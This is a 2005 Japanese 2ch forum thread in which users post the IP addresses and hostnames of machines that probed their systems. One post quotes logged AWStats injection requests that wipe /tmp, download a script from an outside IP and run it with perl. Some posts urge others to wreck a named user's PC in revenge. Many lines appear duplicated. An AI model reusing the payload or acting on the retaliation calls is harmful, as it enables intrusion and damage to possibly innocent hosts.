不正アクセスしてくるIPを晒すスレ Part7
944 :名無しさん@お腹いっぱい。:2005/11/01(火) 11:48:13
簡単に自ホストのセキュリティホールをチェックする方法って
何かないかな。
何かないかな。
945 :名無しさん@お腹いっぱい。:2005/11/01(火) 12:35:53
個別ポート指定でスキャンスするサイトなら知ってる。
946 :名無しさん@お腹いっぱい。:2005/11/02(水) 00:07:23
>>942
http://members.lycos.co.uk/sosonel/in
をDLしようとしてる。
狙われてるということは、ttp://IPではなく、ttp://ホスト名/だと、やられる可能性大かも。
つまり、セキュリティホールのあるバージョンのサーバーと判断された。
http://members.lycos.co.uk/sosonel/in
をDLしようとしてる。
狙われてるということは、ttp://IPではなく、ttp://ホスト名/だと、やられる可能性大かも。
つまり、セキュリティホールのあるバージョンのサーバーと判断された。
947 :名無しさん@お腹いっぱい。:2005/11/02(水) 00:52:20
948 :名無しさん@お腹いっぱい。:2005/11/02(水) 19:03:41
>>946
サーバ(マシン全体あるいはウェブサーバ)がじゃなくて、
awstatsの特定バージョンに穴があるんでしょ。有名やん。
うちにも同じのはときどきくる。最新は29日に219.166.34.48からきた。
サーバ(マシン全体あるいはウェブサーバ)がじゃなくて、
awstatsの特定バージョンに穴があるんでしょ。有名やん。
うちにも同じのはときどきくる。最新は29日に219.166.34.48からきた。
949 :名無しさん@お腹いっぱい。:2005/11/02(水) 20:28:54
IPアドレス 202.231.11.246
ホスト名 intrasrv.asahikawa-nct.ac.jp
IPアドレス
割当国 ※ 日本 (JP)
ホスト名 intrasrv.asahikawa-nct.ac.jp
IPアドレス
割当国 ※ 日本 (JP)
950 :名無しさん@お腹いっぱい。:2005/11/02(水) 21:21:53
210.143.155.18:135
フリービット株式会社
何か攻撃してくるお(><)
フリービット株式会社
何か攻撃してくるお(><)
951 :名無しさん@お腹いっぱい。:2005/11/03(木) 01:02:40
218.217.109.45
achrsm002045.adsl.ppp.infoweb.ne.jp
achrsm002045.adsl.ppp.infoweb.ne.jp
952 :名無しさん@お腹いっぱい。:2005/11/03(木) 01:17:49
アクセス禁止にされたサイトを見る方法ってありますか?
953 :名無しさん@お腹いっぱい。:2005/11/03(木) 01:20:29
ZD084196.ppp.dion.ne.jp
IP(220.214.84.196)
このIPのPC壊すことできますか?
できたらやってください。
IP(220.214.84.196)
このIPのPC壊すことできますか?
できたらやってください。
954 :名無しさん@お腹いっぱい。:2005/11/03(木) 02:00:53
>>953
んで、その人がリモートホストを変えない自信はどこからあふれてきてるんですか?
んで、その人がリモートホストを変えない自信はどこからあふれてきてるんですか?
955 :名無しさん@お腹いっぱい。:2005/11/03(木) 02:08:54
わからんけどこわしてw
956 :名無しさん@お腹いっぱい。:2005/11/03(木) 02:25:31
. + /K\ /K\ /K\ + 復讐っ
復讐っ( ´∀`∩(´∀`∩)( ´ー`)
+ (( (つ ノ(つ 丿(つ つ )) +
ヽ ( ノ ( ノ ) ) ) 復讐っ
復讐っ(_)し' し(_) (_)_)
復讐っ( ´∀`∩(´∀`∩)( ´ー`)
+ (( (つ ノ(つ 丿(つ つ )) +
ヽ ( ノ ( ノ ) ) ) 復讐っ
復讐っ(_)し' し(_) (_)_)
957 :名無しさん@お腹いっぱい。:2005/11/03(木) 02:37:31
いつまでも同じホスト踏み台にしてるようなアフォのPCなら勝手に壊れるだろ
958 :名無しさん@お腹いっぱい。:2005/11/03(木) 02:38:18
壊せないのか。
959 :名無しさん@お腹いっぱい。:2005/11/03(木) 02:41:21
>>958
セキュリティホールがなければな
セキュリティホールがなければな
960 :名無しさん@お腹いっぱい。:2005/11/03(木) 02:50:46
ZD084196.ppp.dion.ne.jp
IP(220.214.84.196)
じゃあやれる人やっちゃって
IP(220.214.84.196)
じゃあやれる人やっちゃって
961 :名無しさん@お腹いっぱい。:2005/11/03(木) 02:57:59
泥棒の家は用心深いもの
962 :名無しさん@お腹いっぱい。:2005/11/03(木) 03:14:03
ZD084196.ppp.dion.ne.jp
IP(220.214.84.196)
これ多分用心してないとおもわれ
IP(220.214.84.196)
これ多分用心してないとおもわれ
963 :名無しさん@お腹いっぱい。:2005/11/03(木) 03:40:11
じゃやってみな
踏み台にされてるだけのヤツならこっちが犯罪だぞ
踏み台にされてるだけのヤツならこっちが犯罪だぞ
964 :名無しさん@お腹いっぱい。:2005/11/04(金) 10:02:52
これも酷い。
2005/11/01(08:15:02) W-SV 211.21.21.227 [80] 302 29 "HEAD / HTTP/1.0" ( )
2005/11/02(20:50:19) W-SV 221024.ds.nac.net(66.246.72.156) [80] 404 0 "GET /awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//203.204.230.205/vnc8.gif;perl%20vnc8.gif;echo%20;rm%20-rf%20vnc8.gif*;echo| HTTP/1.1" ( dummy )
2005/11/02(20:50:21) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:23) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:23) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:24) W-SV 221024.ds.nac.net(66.246.72.156) [80] 404 0 "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//203.204.230.205/vnc8.gif;perl%20vnc8.gif;echo%20;rm%20-rf%20vnc8.gif*;echo| HTTP/1.1" ( dummy )
抜けてるのは同じような内容。パスが微妙に違うだけ。
2005/11/01(08:15:02) W-SV 211.21.21.227 [80] 302 29 "HEAD / HTTP/1.0" ( )
2005/11/02(20:50:19) W-SV 221024.ds.nac.net(66.246.72.156) [80] 404 0 "GET /awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//203.204.230.205/vnc8.gif;perl%20vnc8.gif;echo%20;rm%20-rf%20vnc8.gif*;echo| HTTP/1.1" ( dummy )
2005/11/02(20:50:21) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:22) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:23) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:23) W-SV 221024.ds.nac.net(66.246.72.156) [80]
2005/11/02(20:50:24) W-SV 221024.ds.nac.net(66.246.72.156) [80] 404 0 "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20http//203.204.230.205/vnc8.gif;perl%20vnc8.gif;echo%20;rm%20-rf%20vnc8.gif*;echo| HTTP/1.1" ( dummy )
抜けてるのは同じような内容。パスが微妙に違うだけ。
965 :名無しさん@お腹いっぱい。:2005/11/04(金) 12:39:24
219.114.1.167
OCN! OCN!
hodogaya
OCN! OCN!
hodogaya
966 :名無しさん@お腹いっぱい。:2005/11/04(金) 14:06:22
PHPのセキュリティ問題深刻だな。
管理者なおまいらは注意しろよ。
管理者なおまいらは注意しろよ。
967 :名無しさん@お腹いっぱい。:2005/11/04(金) 15:01:20
あぱっち!あぱっち!
968 :名無しさん@お腹いっぱい。:2005/11/04(金) 18:54:50
ほれ来た!
222.13.84.223
ZQ084223.ppp.dion.ne.jp
222.13.84.223
ZQ084223.ppp.dion.ne.jp
969 :名無しさん@お腹いっぱい。:2005/11/04(金) 20:30:23
219-100-38-145.denkosekka.ne.jp [219.100.38.145]
Port:4498にやたらアクセスがあった
Port:4498にやたらアクセスがあった
970 :名無しさん@お腹いっぱい。:2005/11/05(土) 00:06:09
IPアドレス「 210.154.158.201 」
ホスト名 「 ris3201.ryucom.ne.jp 」
忘れかけた頃に間違い無く突撃して来るんだよな・・・
沖縄って甘い連中が多いのか?
ホスト名 「 ris3201.ryucom.ne.jp 」
忘れかけた頃に間違い無く突撃して来るんだよな・・・
沖縄って甘い連中が多いのか?
971 :名無しさん@お腹いっぱい。:2005/11/05(土) 02:48:55
日付と時刻: 2005.11.5 2:06:38 AM
処理: アクセス試行を拒否しました
サービス: 不明
ポート: 135
モード: TCP
IP アドレス: 210.139.197.176
ホスト名: p8bc5b0.onenum03.ap.so-net.ne.jp
ソネットの糞バカ! ネトゲ止めれ!
処理: アクセス試行を拒否しました
サービス: 不明
ポート: 135
モード: TCP
IP アドレス: 210.139.197.176
ホスト名: p8bc5b0.onenum03.ap.so-net.ne.jp
ソネットの糞バカ! ネトゲ止めれ!
972 :名無しさん@お腹いっぱい。:2005/11/05(土) 09:42:27
220.97.150.183
OCN
OCN
973 :名無しさん@お腹いっぱい。:2005/11/05(土) 09:47:42
NEWTEAR攻撃ってのとフラグメントフラッドエラーってのが交互に頻繁にあります。
恐いです・・・
恐いです・・・
勝手に不正アクセスしてくるIPを晒していくスレ
FWのIPフィルター設定し、アクセス拒否する参考にドゾー
注:Whois 全部貼らなくていいから
IPと国ぐらいで簡単に報告!
IPアドレスの検索は、
IPドメインSEARCH
http://www.mse.co.jp/ip_domain/
IPアドレス検索/サイバーエリアリサーチ株式会社
http://www.arearesearch.co.jp/ip-kensaku.html
サイトチェック
http://sitecheck.jp/checkip.phtml
McAfee NeoTrace Express 3.25
http://www.networkingfiles.com/PingFinger/Neotraceexpress.htm
前スレ
不正アクセスしてくるIPを晒すスレ Part7
http://pc8.2ch.net/test/read.cgi/sec/1117558232/
FWのIPフィルター設定し、アクセス拒否する参考にドゾー
注:Whois 全部貼らなくていいから
IPと国ぐらいで簡単に報告!
IPアドレスの検索は、
IPドメインSEARCH
http://www.mse.co.jp/ip_domain/
IPアドレス検索/サイバーエリアリサーチ株式会社
http://www.arearesearch.co.jp/ip-kensaku.html
サイトチェック
http://sitecheck.jp/checkip.phtml
McAfee NeoTrace Express 3.25
http://www.networkingfiles.com/PingFinger/Neotraceexpress.htm
前スレ
不正アクセスしてくるIPを晒すスレ Part7
http://pc8.2ch.net/test/read.cgi/sec/1117558232/
216 名前:名無しさん@お腹いっぱい。 投稿日:05/01/22 18:37:37
>>216
スレ勉しる。
おまいの晒したIP無意味だぽ。
反論したければ、特定結果かもしくは通報の返答をうpしる。
っても、池沼にゃ無理な相談か。。。
>>216 m9(^Д^)
>>216
スレ勉しる。
おまいの晒したIP無意味だぽ。
反論したければ、特定結果かもしくは通報の返答をうpしる。
っても、池沼にゃ無理な相談か。。。
>>216 m9(^Д^)
976 :名無しさん@お腹いっぱい。:2005/11/05(土) 13:44:06
*NetBIOS www.naver.co.kr NETBIOS_DGM 受信 UDP
パソコンを起動するとファイヤーウォールに必ずこれが出てきます。
時間を見るとパソコン起動時か、ネット接続時などの早期に繋がっているようです。
もちろんNAVERには行っていません。
2ちゃんねるのスポンサーなのでそのせいでしょうか?
誰かわかる方いたら教えてください・・・
パソコンを起動するとファイヤーウォールに必ずこれが出てきます。
時間を見るとパソコン起動時か、ネット接続時などの早期に繋がっているようです。
もちろんNAVERには行っていません。
2ちゃんねるのスポンサーなのでそのせいでしょうか?
誰かわかる方いたら教えてください・・・
977 :名無しさん@お腹いっぱい。:2005/11/05(土) 18:39:41
IPアドレス 133.46.31.48
ホスト名 carnation.ier.hit-u.ac.jp
IPアドレス
割当国 ※ 日本 (JP)
ホスト名 carnation.ier.hit-u.ac.jp
IPアドレス
割当国 ※ 日本 (JP)
978 :名無しさん@お腹いっぱい。:2005/11/05(土) 19:10:13
このIPからしつこくポートスキャンくるんだけど個人?
61.213.156.139
role: Japan Network Information Center
address: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
address: Chiyoda-ku, Tokyo 101-0047, Japan
country: JP
phone: +81-3-5297-2311
fax-no: +81-3-5297-2312
e-mail: [email protected]
admin-c: JI13-AP
tech-c: JE53-AP
nic-hdl: JNIC1-AP
mnt-by: MAINT-JPNIC
changed: [email protected] 20041222
changed: [email protected] 20050324
changed: [email protected] 20051027
source: APNIC
61.213.156.139
role: Japan Network Information Center
address: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kanda
address: Chiyoda-ku, Tokyo 101-0047, Japan
country: JP
phone: +81-3-5297-2311
fax-no: +81-3-5297-2312
e-mail: [email protected]
admin-c: JI13-AP
tech-c: JE53-AP
nic-hdl: JNIC1-AP
mnt-by: MAINT-JPNIC
changed: [email protected] 20041222
changed: [email protected] 20050324
changed: [email protected] 20051027
source: APNIC
979 :名無しさん@お腹いっぱい。:2005/11/05(土) 19:17:42
IPドメインSEARCHで調べたらここだった踏み台かな?
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.213.156.128/27
b. [ネットワーク名] REDSHERIFF
f. [組織名] レッド・シェリフ株式会社
g. [Organization] Red Sheriff
m. [管理者連絡窓口] SE462JP
n. [技術連絡担当者] SE462JP
n. [技術連絡担当者] TT6344JP
p. [ネームサーバ]
[割当年月日] 2003/04/11
[最終更新] 2003/04/11 18:12:03(JST)
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.213.156.128/27
b. [ネットワーク名] REDSHERIFF
f. [組織名] レッド・シェリフ株式会社
g. [Organization] Red Sheriff
m. [管理者連絡窓口] SE462JP
n. [技術連絡担当者] SE462JP
n. [技術連絡担当者] TT6344JP
p. [ネームサーバ]
[割当年月日] 2003/04/11
[最終更新] 2003/04/11 18:12:03(JST)
980 :名無しさん@お腹いっぱい。:2005/11/06(日) 06:41:06
以下の3つから大量にftpアタック。
63.110.56.253
68.225.152.253
208.189.27.253
以下からはWebHintsの脆弱性狙いのアタック。
62.101.193.244
63.110.56.253
68.225.152.253
208.189.27.253
以下からはWebHintsの脆弱性狙いのアタック。
62.101.193.244
981 :名無しさん@お腹いっぱい。:2005/11/06(日) 07:51:53
220.210.120.74
t120074.ipgw.phs.yoyogi.mopera.
t120074.ipgw.phs.yoyogi.mopera.
982 :( ・∀・)<エロいな&rlo; ◆rc0OtQvVQY :2005/11/06(日) 07:53:27
IPって晒されたらヤヴァいの?
あとためしにこのIPについて調べてくだせぇ
i220-108-0-187.s02.a001.ap.plala.or.jp
あとためしにこのIPについて調べてくだせぇ
i220-108-0-187.s02.a001.ap.plala.or.jp
983 :名無しさん@お腹いっぱい。:2005/11/06(日) 08:49:23
もうヤヴァすぎ
984 :名無しさん@お腹いっぱい。:2005/11/06(日) 10:23:30
985 :エロいな&rlo;ンマこんう&rle;&lro; ◆rc0OtQvVQY :2005/11/06(日) 10:34:07
986 :名無しさん@お腹いっぱい。:2005/11/06(日) 11:27:10
IPアドレス 60.124.139.28
ホスト名 YahooBB060124139028.bbtec.net
ホスト名 YahooBB060124139028.bbtec.net
987 :名無しさん@お腹いっぱい。:2005/11/06(日) 11:28:44
つーか全部IP偽装でアタックしてんだよ
あほかこのスレ
もうやめれ
あほかこのスレ
もうやめれ
988 :名無しさん@お腹いっぱい。:2005/11/06(日) 11:37:17
IP偽装の仕組み知ってる?
IP偽装でどんな攻撃ができるかとか。
IP偽装だと不正アクセスはできない。
IP偽装でどんな攻撃ができるかとか。
IP偽装だと不正アクセスはできない。
989 :名無しさん@お腹いっぱい。:2005/11/06(日) 11:40:00
>>988
それは、ギャグで言っているのか?(AA略)
それは、ギャグで言っているのか?(AA略)
990 :名無しさん@お腹いっぱい。:2005/11/06(日) 11:45:15
>>988
おまいの晒したIP無意味だぽ。
おまいの晒したIP無意味だぽ。
991 :名無しさん@お腹いっぱい。:2005/11/06(日) 12:19:44
もうすぐカウントダウン開始で終焉。
次スレ立てるなよ!
次スレ立てるなよ!
992 :名無しさん@お腹いっぱい。:2005/11/06(日) 13:10:35
このスレッドは1000を超えました。
もう書けないので、終わりです。
もう書けないので、終わりです。
あらあら。